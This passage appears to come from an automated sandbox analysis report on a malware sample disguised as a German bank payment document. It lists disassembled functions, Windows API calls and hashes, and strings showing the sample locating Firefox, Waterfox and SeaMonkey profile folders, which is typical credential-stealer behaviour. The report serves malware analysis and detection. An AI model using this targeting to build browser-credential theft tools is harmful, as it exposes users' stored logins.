                                                                                                                                                                                                                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                          • String ID: C:\Windows\system32
                                                                                                                                                                                                                                          • API String ID: 669240632-2896066436
                                                                                                                                                                                                                                          • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                                                                                                                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                                                          Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                                          • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                                                          • API String ID: 4039892925-11920434
                                                                                                                                                                                                                                          • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                                                                                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                                                          Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                                                          • API String ID: 4039892925-2068335096
                                                                                                                                                                                                                                          • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                                                                                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                                                          Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                                                          • API String ID: 4039892925-3369679110
                                                                                                                                                                                                                                          • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                                                                                                                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                                                          Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                                          • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                                          • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                                          Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                                                          • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                                                          • String ID: $0.@
                                                                                                                                                                                                                                          • API String ID: 2758756878-1896041820
                                                                                                                                                                                                                                          • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                                                                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                                          Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2941347001-0
                                                                                                                                                                                                                                          • Opcode ID: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                                                                                                                                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                                          Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                                          • API String ID: 1534475566-1174173950
                                                                                                                                                                                                                                          • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                                                                                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                                                          Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                          • API String ID: 71295984-2036018995
                                                                                                                                                                                                                                          • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                                                                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                                                          Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                                          • String ID: "%s"
                                                                                                                                                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                                          • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                                                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                                          Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                                                          Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
